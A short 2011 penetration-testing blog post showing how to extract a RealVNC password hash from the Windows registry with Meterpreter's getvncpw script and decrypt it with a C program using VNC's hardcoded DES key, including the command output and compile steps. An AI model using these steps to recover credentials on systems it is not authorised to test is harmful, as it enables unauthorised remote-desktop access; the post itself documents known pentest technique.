Tuesday, March 15, 2011

VNC passwords and Metasploit and DES

inside your meterpreter shell run getvncpw

meterpreter > run getvncpw
[*] Searching for VNC Passwords in the registry....

[*] FOUND in HKLM\Software\RealVNC\WinVNC4 -=> 3290e903b5bf3769 =>

you're probably asking yourself what the F kind of password 3290e... is. Well its DES encrypted. Lucky for us the key is hardcoded (0x238210763578887) and since VNC is open source...

code here:

change the relevant section

/* put your password hash here in p[] */

char p[]={0x59,0x58,0x6e,0x10,0xa4,0x48,0xd3,0x80};

getvncpw spit out: 3290e903b5bf3769

char p[]={0x32,0x90,0xe9,0x03,0xb5,0xbf,0x37,0x69};

cg@segfault:~/pentest$ gcc vncdec.c -o vncdec
cg@segfault:~/pentest$ ./vncdec

or use this one

where you can just put your hash on the command line and don't have to recompile every time.

1 comment:

mubix said...

I rewrote the script as a post module.

Info here:

Commited as of r12048